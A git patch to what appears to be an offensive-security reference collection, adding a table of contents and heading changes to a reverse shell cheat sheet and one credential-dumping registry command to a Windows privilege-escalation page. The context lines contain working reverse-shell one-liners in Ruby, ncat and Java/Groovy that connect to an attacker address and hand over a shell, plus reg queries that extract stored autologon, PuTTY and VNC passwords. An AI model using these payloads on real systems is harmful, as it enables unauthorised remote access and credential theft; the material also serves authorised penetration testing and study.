From 3af87ddf9851263f3ea883ecdef562720c93b412 Mon Sep 17 00:00:00 2001
From: Swissky
Date: Tue, 2 Apr 2019 22:43:44 +0200
Subject: [PATCH] Reverse shell summary + golang

---
 .../Reverse Shell Cheatsheet.md | 36 ++++++++++++++++---
 .../Windows - Privilege Escalation.md | 1 +
 2 files changed, 32 insertions(+), 5 deletions(-)

diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md
index 908c494..4868a7c 100644
--- a/Methodology and Resources/Reverse Shell Cheatsheet.md
+++ b/Methodology and Resources/Reverse Shell Cheatsheet.md
@@ -1,6 +1,30 @@
-# Reverse Shell Methods
+# Reverse Shell Cheat Sheet
 
-## Reverse Shell Cheat Sheet
+## Summary
+
+* [Reverse Shell](#reverse-shell)
+ * [Bash TCP](#bash-tcp)
+ * [Bash UDP](#bash-udp)
+ * [Perl](#perl)
+ * [Python](#python)
+ * [PHP](#php)
+ * [Ruby](#ruby)
+ * [Goland](#golang)
+ * [Netcat Traditional](#netcat-traditional)
+ * [Netcat OpenBsd](#netcat-openbsd)
+ * [Ncat](#ncat)
+ * [OpenSSL](#openssl)
+ * [Powershell](#powershell)
+ * [Awk](#awk)
+ * [Java](#java)
+ * [War](#war)
+ * [Lua](#lua)
+ * [NodeJS](#nodejs)
+ * [Groovy](#groovy)
+* [Spawn TTY Shell](#spawn-tty-shell)
+* [References](#references)
+
+## Reverse Shell
 
 ### Bash TCP
 
@@ -77,6 +101,7 @@ ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.
 NOTE: Windows only
 ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
 ```
+
 ### Golang
 
 ```bash
@@ -102,7 +127,7 @@ ncat 127.0.0.1 4444 -e /bin/bash
 ncat --udp 127.0.0.1 4444 -e /bin/bash
 ```
 
-## OpenSSL
+### OpenSSL
 
 ```powershell
 hacker@kali$ openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
@@ -194,8 +219,9 @@ or https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py
 ```
 
 
-### Groovy - by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76)
+### Groovy
 
+by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76)
 NOTE: Java reverse shell also work for Groovy
 
 ```javascript
@@ -205,7 +231,7 @@ String cmd="cmd.exe";
 Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
 ```
 
-## Spawn TTY
+## Spawn TTY Shell
 
 Access shortcuts, su, nano and autocomplete in a partially tty shell
 /!\ OhMyZSH might break this trick, a simple `sh` is recommended
diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md
index c4fd7a0..b63bae5 100644
--- a/Methodology and Resources/Windows - Privilege Escalation.md
+++ b/Methodology and Resources/Windows - Privilege Escalation.md
@@ -209,6 +209,7 @@ REG QUERY HKLM /F "password" /t REG_SZ /S /K
 
 REG QUERY HKCU /F "password" /t REG_SZ /S /K
 reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin
+reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
 reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # SNMP parameters
 reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Putty clear text proxy credentials
 reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials